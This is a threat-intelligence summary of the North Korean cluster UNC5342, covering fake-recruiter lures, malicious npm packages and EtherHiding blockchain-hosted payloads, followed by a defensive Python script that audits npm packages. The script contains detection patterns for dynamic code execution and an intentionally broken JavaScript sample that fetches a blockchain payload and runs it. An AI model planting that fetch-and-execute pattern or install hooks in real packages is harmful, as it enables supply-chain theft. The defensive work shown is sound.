Full Report
A threat actor with ties to the Democratic People's Republic of Korea (aka North Korea) has been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed by Google Threat Intelligence Group (GTIG) to a threat cluster it tracks as UNC5342,
Analysis Summary
# Threat Actor: UNC5342 (North Korea State-Sponsored)
## Attribution & Identity
The threat actor is associated with the **Democratic People's Republic of Korea (North Korea)**.
Known aliases include: CL-STA-0240 (Palo Alto Networks Unit 42), DeceptiveDevelopment (ESET), DEV#POPPER (Securonix), Famous Chollima (CrowdStrike), Gwisin Gang (DTEX), Tenacious Pungsan (Datadog), and Void Dokkaebi (Trend Micro).
## Activity Summary
The actor is engaged in a long-running campaign codenamed **Contagious Interview**. The campaign socially engineers its targets, specifically software developers, via LinkedIn, with operators posing as recruiters or hiring managers. The conversation is moved to Telegram or Discord, where targets are tricked into running malicious code under the guise of a job assessment. The primary goals are cyber espionage and financial gain: stealing sensitive data and siphoning cryptocurrency assets. The group has been using the **EtherHiding** technique since February 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Posing as recruiters/hiring managers on LinkedIn, then moving the conversation to Telegram/Discord to trick victims into running malicious code for "job assessments." (Assumed MITRE mapping: T1566.001/T1566.002 Phishing: Spearphishing Attachment/Link for the lure, T1059 Command and Scripting Interpreter for code execution)
- **Malware Delivery via Software Supply Chain:** Initial download manifests as malicious **npm packages**.
- **Cryptocurrency Theft/Blockchain Exploitation:** Utilizing **EtherHiding** to embed malicious code within smart contracts on public blockchains (BNB Smart Chain, Ethereum). This turns the blockchain into a decentralized, takedown-resistant dead drop resolver (MITRE T1102.001: Web Service: Dead Drop Resolver).
- **Payload Execution:** Multi-stage infection chain targeting Windows, macOS, and Linux systems.
- **Payload Updating:** The attacker can update the malicious payload within the smart contract remotely.
- **Lateral Movement/Control:** Deployment of a Python backdoor for remote control and long-term data theft.
## Targeting
- Sectors: Software development (implied by the social engineering vector, which is built around job assessments for developers).
- Geography: Not explicitly stated, but attribution is North Korean state-sponsored activity.
- Victims: Developers, with specific components targeting MetaMask, Phantom wallets, and password managers (like 1Password).
## Tools & Infrastructure
- **Malware Families Used:**
* Initial downloader (via npm packages)
* BeaverTail (JavaScript stealer: exfiltrates crypto wallets, browser extension data, credentials)
* JADESNOW (JavaScript downloader that fetches InvisibleFerret)
* InvisibleFerret (Python backdoor: grants remote control, targets wallets/credentials)
- **Infrastructure:**
* **EtherHiding:** Malicious code embedded in smart contracts on public blockchains (BNB Smart Chain, Ethereum). This acts as resilient C2/payload hosting.
## Implications
This marks an escalation in nation-state threat actor methodology. UNC5342 is utilizing blockchain technology (**EtherHiding**) to create next-generation, bulletproof hosting for malware payloads, making them highly resistant to traditional law enforcement takedown efforts. The flexibility to update payloads remotely also increases the longevity and adaptability of their attacks.
## Mitigations
- Increased vigilance regarding unsolicited contact from "recruiters" on professional platforms, especially when interactions move to platforms like Telegram or Discord for job assessments.
- Implement strict controls on running code or installing dependencies (e.g., npm packages) received from untrusted sources or in suspicious contexts.
- Enhance endpoint detection capabilities across Windows, macOS, and Linux to identify the known malware stages (BeaverTail, JADESNOW, InvisibleFerret).
- Audit and monitor organizational crypto assets/wallets for unauthorized access attempts, particularly those using MetaMask or Phantom.
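The following audit script is an added example written for this summary; it is not code from the report, from GTIG, or from any of the malware families named above. It applies two of the points made in the TTP list (malicious npm packages as the initial download, and EtherHiding-style loaders that read their next stage from a public blockchain) and the mitigation about strict controls on installing dependencies from untrusted sources. It walks an npm package directory and flags (1) install-time lifecycle hooks that would execute code during `npm install`, and (2) JavaScript files that contain both a chain-read indicator (JSON-RPC `eth_call`, an ethers/web3 provider) and a dynamic-execution indicator (`eval`, `new Function`, `vm.runInThisContext`, `child_process`) in the same file. The indicator lists, the package names and the two sample sources are assumptions constructed for the demonstration; the "loader-shaped" sample is deliberately incomplete and does nothing, it only has the textual shape the heuristic looks for.

```python
"""Audit an npm package directory for two red flags from the UNC5342 summary.

Added example, not code from the report or from GTIG. Indicator regexes are
illustrative assumptions, not a vetted signature set.
"""
import json
import pathlib
import re
import tempfile

# npm runs these hooks automatically on install; untrusted packages should not carry them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Hypothetical indicators that a file reads data from a blockchain node.
CHAIN_READ_PATTERNS = {
    "json-rpc eth_call": re.compile(r"\beth_call\b"),
    "json-rpc eth_getStorageAt": re.compile(r"\beth_getStorageAt\b"),
    "ethers provider": re.compile(r"\bJsonRpcProvider\s*\("),
    "web3 provider": re.compile(r"\bnew\s+Web3\s*\("),
}
# Hypothetical indicators that a file turns text into executable code.
DYNAMIC_EXEC_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "Function constructor": re.compile(r"\bnew\s+Function\s*\("),
    "vm.runIn*Context": re.compile(r"\bvm\.runIn(?:This|New)Context\s*\("),
    "child_process": re.compile(r"\bchild_process\b"),
}


def audit_lifecycle_scripts(package_json: dict) -> dict:
    """Return {hook: command} for every install-time hook that would run code."""
    scripts = package_json.get("scripts", {})
    return {hook: scripts[hook] for hook in LIFECYCLE_HOOKS if hook in scripts}


def scan_js_source(source: str) -> dict:
    """Classify one JavaScript source text; 'suspicious' needs both indicator classes.

    A chain read alone is normal for a wallet or dapp library; execution alone is
    common in bundlers. The combination is the EtherHiding loader pattern.
    """
    reads = [name for name, rx in CHAIN_READ_PATTERNS.items() if rx.search(source)]
    execs = [name for name, rx in DYNAMIC_EXEC_PATTERNS.items() if rx.search(source)]
    return {"chain_read": reads, "dynamic_exec": execs,
            "suspicious": bool(reads) and bool(execs)}


def audit_package(pkg_dir: pathlib.Path) -> dict:
    """Walk a package directory: check package.json hooks and every JS file."""
    hooks = {}
    pkg_json_path = pkg_dir / "package.json"
    if pkg_json_path.is_file():
        hooks = audit_lifecycle_scripts(json.loads(pkg_json_path.read_text(encoding="utf-8")))
    flagged_files = {}
    for path in pkg_dir.rglob("*"):
        if path.is_file() and path.suffix in (".js", ".cjs", ".mjs"):
            result = scan_js_source(path.read_text(encoding="utf-8", errors="replace"))
            if result["suspicious"]:
                flagged_files[str(path.relative_to(pkg_dir))] = result
    return {"lifecycle_hooks": hooks, "flagged_files": flagged_files,
            "verdict": "REVIEW" if hooks or flagged_files else "OK"}


# Constructed sample inputs (not real packages, not real malware).
BENIGN_JS = """
const { ethers } = require("ethers");
const provider = new ethers.JsonRpcProvider(process.env.RPC_URL);
async function balance(addr) { return provider.getBalance(addr); } // reads chain, never executes it
module.exports = { balance };
"""

# Textual shape of an EtherHiding-style loader, for detection purposes only.
# Deliberately incomplete (RPC_URL, ADDR, SEL, decode are undefined) and non-functional.
LOADER_SHAPED_JS = """
const res = await fetch(RPC_URL, { method: "POST",
  body: JSON.stringify({ jsonrpc: "2.0", method: "eth_call", params: [{ to: ADDR, data: SEL }, "latest"] }) });
new Function(decode((await res.json()).result))();
"""

SUSPICIOUS_PACKAGE_JSON = {
    "name": "example-assessment-task", "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js", "test": "jest"},
}


def demo() -> dict:
    """Materialise two constructed packages in a temp dir and audit both."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        benign = root / "benign-lib"
        benign.mkdir()
        (benign / "package.json").write_text(json.dumps(
            {"name": "benign-lib", "version": "1.0.0", "scripts": {"test": "jest"}}), encoding="utf-8")
        (benign / "index.js").write_text(BENIGN_JS, encoding="utf-8")
        task = root / "assessment-task"
        task.mkdir()
        (task / "package.json").write_text(json.dumps(SUSPICIOUS_PACKAGE_JSON), encoding="utf-8")
        (task / "setup.js").write_text(LOADER_SHAPED_JS, encoding="utf-8")
        return {"benign-lib": audit_package(benign), "assessment-task": audit_package(task)}


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, json.dumps(report, indent=2))
```

Run it against a package before installing it (for example after `npm pack` or on a cloned "assessment" repository). A `REVIEW` verdict is a prompt for a human look, not a malware verdict: the chain-read indicators fire on legitimate wallet code, which is why the heuristic only flags a file when a code-execution primitive sits in the same file.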